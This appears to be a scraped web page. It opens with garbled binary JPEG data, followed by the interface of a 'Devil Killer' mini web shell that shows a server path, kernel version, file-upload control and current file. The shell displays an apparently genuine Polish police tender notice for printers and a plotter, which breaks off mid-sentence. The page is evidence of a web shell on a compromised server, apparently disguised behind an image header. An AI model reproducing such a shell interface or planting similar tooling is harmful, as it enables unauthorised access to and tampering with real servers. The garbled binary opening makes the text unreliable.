JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240617/0036906101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i dostawa sprzętu drukującego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i dostawa sprzętu drukującego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e860bda7-2c73-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00369061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00244141/21/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.13 Zakup i dostawa sprzętu drukującego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c) Zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;d) Włączona obsługa JavaScript;e) Zainstalowany program<br/>Acrobat Reader lub inny obsługujący pliki w formacie .pdf.f) Dopuszczalny format przesyłanych danych tj. plików o wielkości do 50<br/>MB w formatach: .pdfg) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie zaszyfrowany.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.h)<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. Poniżej została określona instrukcja<br/>korzystania z Platformy, tj.: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu<br/>danych<br/>użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system. b) w zakładce „Postępowania”,<br/>„Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś się do udziału w<br/>postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na Platformie lub panelu<br/>logowania użytkownika do Systemu.<br/>c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że może dokonać pierwszego logowania<br/>do Platformy.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z https://slaskapolicja.<br/>eb2b.com.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>ustawy. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).b) W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z Zaleca się, aby komunikacja<br/>z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza Pytania/Informacje”, nie za pośrednictwem adresu<br/>email.<br/>Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telefonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail:<br/>helpdesk@eb2b.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w<br/>Katowicach z siedzibą przy ul. J. Lompy 19, 40-038 Katowice; 2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie<br/>Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w Katowicach przy ul. J. Lompy 19, tel. 47-851-24-03, e<br/>mailiod.kwp@ka.policja.gov.pl; 3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz realizacji tego zamówienia; 4. Podstawą prawną przetwarzania<br/>dotyczących Pani/Pana danych osobowych jest ustawa z dnia 11 września 2019r. Prawo zamówień publicznych(Dz.U.<br/>2022r.poz.1710), zwana w dalszej części „ustawą Pzp”; 5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień<br/>Publicznych, ponadto w zakresie określonym w ustawie Pzp, dane mogą być publikowane<br/>nastronieinternetowejhttp://bip.katowice.kwp.policja.gov.pl oraz innym podmiotom uprawnionym na podstawie odrębnych<br/>przepisów;6.Pani/Pana dane nie będą przekazywane do państwa trzeciego, organizacji międzynarodowej; 7. Okres przechowywania<br/>Pani/Pana danych osobowych wynika z przepisów dotyczących okresów przechowywania akt w Policji. 8. Posiada Pani/Pan prawo<br/>żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania, ograniczenia przetwarzania i wniesienia<br/>sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami prawa; 9. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych; 10. Podanie danych jest<br/>wymogiem<br/>ustawowym; 11.W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie<br/>zamówieniapublicznego;12.Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu13.Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych<br/>i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO). Obowiązek<br/>poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na<br/>Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone w<br/>załącznikunr1 do SWZ – formularz ofertowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-250/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostawą urządzeń wielofunkcyjnych w ilości 50 sztuk zgodnie z opisem<br/>przedmiotu zamówienia stanowiącym załącznik 3 A do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> − Zamawiający zastrzega sobie prawo skorzystania z opcji na podstawie art. 441 ust. 1 ustawy Pzp w zakresie zwiększenia<br/>ilości w ramach tych samych środków finansowych.<br/>− Ilość zamówionych urządzeń wielofunkcyjnych w ramach opcji będzie wynikać z zaoferowanej ceny jednostkowej brutto i<br/>kwoty jaką Zamawiający zamierza przeznaczyć na realizację zamówienia tj. różnicy pomiędzy kwotą jaką Zamawiający<br/>zamierza przeznaczyć na realizację zamówienia (449 965,98 zł brutto) i ceny oferty za Zadanie 1 podzielonej przez<br/>zaoferowaną cenę jednostkową urządzenia wielofunkcyjnego.<br/>− Urządzenia wielofunkcyjne zakupione w ramach prawa opcji będą tożsame z urządzeniami wielofunkcyjnymi<br/>zaoferowanymi w ramach zamówienia podstawowego.<br/>− Zamawiający zastrzega, iż wykonanie części zamówienia w ramach prawa opcji jest uprawnieniem, a nie zobowiązaniem<br/>Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z niego w mniejszym zakresie niż określony<br/>powyżej, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>− W przypadku skorzystania przez Zamawiającego z prawa opcji dostarczony w ramach opcji asortyment będzie rozliczony<br/>po cenach jednostkowych takich jak dla zamówienia podstawowego.<br/>− Zamawiając przewiduje możliwość skorzystania z prawa opcji w terminie obowiązywania umowy.<br/>− W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na<br/>warunkach określonych w umowie.<br/>− Zamawiający poinformuje Wykonawcę o skorzystaniu z prawa opcji na piśmie najpóźniej w dniu podpisania umowy <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów:<br/>Y = A+B<br/>Y – Suma punktów badanej ważnej oferty<br/>A – Cena brutto oferty – max. 60 pkt.<br/>B – Gwarancja na asortyment – max. 40 pkt.<br/>2. Ocena ofert:<br/>2.1 Kryterium A – cena brutto oferty. Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny<br/>najniższej spośród ofert niepodlegających odrzuceniu.<br/>Punkty za kryterium będą obliczone wg wzoru:<br/>najniższa oferowana cena brutto z ważnych ofert<br/>A = ------------------------------------------------------------------------x 60 pkt<br/>cena brutto badanej oferty<br/>2.1.1.Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną oferty brutto otrzyma maksymalną liczbę punktów tj.: 60.<br/>b) inne ważne oferty z podaną sumą wartości tabeli stałej zostaną przeliczone wg. powyższego wzoru.<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2. Zasady przyznawania punktów:<br/>a) Wartości liczone będą do dwóch miejsc po przecinku.<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>kryterium B – oferowany okres gwarancji na sprzęt.<br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym<br/>zgodnie z poniższymi zasadami: .<br/>Okres gwarancji – oznacza okres liczony od daty dostawy sprzętu potwierdzonej protokołem, w którym Wykonawca w ramach<br/>wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości sprzętu zgodnie z SWZ, w<br/>szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych<br/>świadczeń na warunkach określonych w umowie.<br/>Wykonawca winien zadeklarować zaokrągloną do pełnego miesiąca wartość z przedziału od 24 do 60 miesięcy<br/>Zadeklarowanie okresu gwarancji krótszego niż 24 miesiące skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy,<br/>a innej niż wyżej wymienione skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z mniejszych<br/>od niej dopuszczalnych wartości całkowitych tj. 60 miesięcy.<br/>Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu<br/>gwarancji przyjętego przez Zamawiającego tj. 24 miesięcy.<br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu<br/>gwarancji na sprzęt spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad –okres gwarancji oferty badanej (w miesiącach)<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiacach)<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na sprzęt.<br/>2.4. Zamawiający przewiduje przeprowadzenie aukcji elektronicznej, gdzie jedynym ruchomym kryterium jest „cena”, pozostałe<br/>kryteria są kryteriami stałymi. W przypadku braku możliwości przeliczenia zgodnie z wylicytowaną kwotą oferty po aukcji<br/>Zamawiający dokona poprawy złożonego formularza cenowego po aukcji, na podstawie art. 223 ust. 2 pkt 2 ustawy Pzp tj. zostanie<br/>poprawiona jako omyłka rachunkowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostawą plotera (1 szt.) zgodnie z opisem przedmiotu zamówienia stanowiącym<br/>załącznik nr 3B do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232140-7 - Plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów:<br/>Y = A+B<br/>Y – Suma punktów badanej ważnej oferty<br/>A – Cena brutto oferty – max. 60 pkt.<br/>B – Gwarancja na asortyment – max. 40 pkt.<br/>2. Ocena ofert:<br/>2.1 Kryterium A – cena brutto oferty. Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny<br/>najniższej spośród ofert niepodlegających odrzuceniu.<br/>Punkty za kryterium będą obliczone wg wzoru:<br/>najniższa oferowana cena brutto z ważnych ofert<br/>A = ------------------------------------------------------------------------x 60 pkt<br/>cena brutto badanej oferty<br/>2.1.1.Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną oferty brutto otrzyma maksymalną liczbę punktów tj.: 60.<br/>b) inne ważne oferty z podaną sumą wartości tabeli stałej zostaną przeliczone wg. powyższego wzoru.<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2. Zasady przyznawania punktów:<br/>a) Wartości liczone będą do dwóch miejsc po przecinku.<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>kryterium B – oferowany okres gwarancji na sprzęt.<br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym<br/>zgodnie z poniższymi zasadami: .<br/>Okres gwarancji – oznacza okres liczony od daty dostawy sprzętu potwierdzonej protokołem, w którym Wykonawca w ramach<br/>wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości sprzętu zgodnie z SWZ, w<br/>szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych<br/>świadczeń na warunkach określonych w umowie.<br/>Wykonawca winien zadeklarować zaokrągloną do pełnego miesiąca wartość z przedziału od 24 do 60 miesięcy<br/>Zadeklarowanie okresu gwarancji krótszego niż 24 miesiące skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy,<br/>a innej niż wyżej wymienione skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z mniejszych<br/>od niej dopuszczalnych wartości całkowitych tj. 60 miesięcy.<br/>Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu<br/>gwarancji przyjętego przez Zamawiającego tj. 24 